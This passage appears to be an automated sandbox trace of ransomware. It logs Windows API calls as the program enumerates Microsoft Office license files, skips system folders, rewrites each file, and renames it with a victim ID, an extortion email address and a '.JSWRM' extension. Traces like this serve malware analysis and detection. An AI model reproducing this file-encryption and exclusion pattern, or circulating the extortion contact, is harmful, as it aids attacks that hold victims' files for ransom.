lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0104.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.033] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19927) returned 1 [0104.033] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0104.033] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0104.036] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.036] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0104.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.036] CloseHandle (hObject=0x45c) returned 1 [0104.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0104.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0104.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0104.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0104.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.037] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0104.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0104.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0104.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0104.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0104.037] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4ddeb2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4ddeb2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4e9d706, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2983, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Retail-pl.xrm-ms", cAlternateFileName="MO7B3F~1.XRM")) returned 1 [0104.038] lstrcmpiW (lpString1="MondoR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0104.038] lstrcmpiW (lpString1="MondoR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0104.038] lstrcmpiW (lpString1="MondoR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0104.038] lstrcmpiW (lpString1="MondoR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0104.038] lstrcmpiW (lpString1="MondoR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0104.038] lstrcmpiW (lpString1="MondoR_Retail-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.038] lstrcmpiW (lpString1="MondoR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.038] lstrcmpiW (lpString1="MondoR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.038] lstrcmpiW (lpString1="MondoR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.038] lstrcmpiW (lpString1="MondoR_Retail-pl.xrm-ms", lpString2="msocache") returned -1 [0104.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0104.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0104.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x241010, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0104.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0104.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0104.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x240f70, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0104.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0104.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0104.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0104.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.039] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10627) returned 1 [0104.039] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0104.039] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0104.041] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.041] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0104.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.041] CloseHandle (hObject=0x45c) returned 1 [0104.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0104.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0104.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0104.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0104.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0104.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0104.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.042] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0104.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0104.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0104.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0104.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0104.043] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4e04d8b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4e04d8b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4ec3936, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x675e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Retail-ppd.xrm-ms", cAlternateFileName="MO6A4E~1.XRM")) returned 1 [0104.043] lstrcmpiW (lpString1="MondoR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0104.043] lstrcmpiW (lpString1="MondoR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0104.043] lstrcmpiW (lpString1="MondoR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0104.043] lstrcmpiW (lpString1="MondoR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0104.043] lstrcmpiW (lpString1="MondoR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.043] lstrcmpiW (lpString1="MondoR_Retail-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.043] lstrcmpiW (lpString1="MondoR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.043] lstrcmpiW (lpString1="MondoR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.043] lstrcmpiW (lpString1="MondoR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.043] lstrcmpiW (lpString1="MondoR_Retail-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0104.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0104.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241038, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0104.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0104.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0104.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0104.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2413d0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0104.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0104.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0104.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0104.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0104.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.044] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26462) returned 1 [0104.044] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6750) returned 0x24c1d0 [0104.044] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6750, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6750, lpOverlapped=0x0) returned 1 [0104.047] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.047] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6750, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6750, lpOverlapped=0x0) returned 1 [0104.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.047] CloseHandle (hObject=0x45c) returned 1 [0104.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0104.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0104.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0104.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0104.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0104.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0104.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.048] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0104.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0104.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0104.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0104.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0104.049] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4d461ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4d461ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4e2afa8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d36, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Retail-ul-oob.xrm-ms", cAlternateFileName="MOD324~1.XRM")) returned 1 [0104.049] lstrcmpiW (lpString1="MondoR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.049] lstrcmpiW (lpString1="MondoR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.049] lstrcmpiW (lpString1="MondoR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.049] lstrcmpiW (lpString1="MondoR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.049] lstrcmpiW (lpString1="MondoR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.049] lstrcmpiW (lpString1="MondoR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.049] lstrcmpiW (lpString1="MondoR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.049] lstrcmpiW (lpString1="MondoR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.049] lstrcmpiW (lpString1="MondoR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.049] lstrcmpiW (lpString1="MondoR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0104.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0104.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0104.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0104.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0104.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241290, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 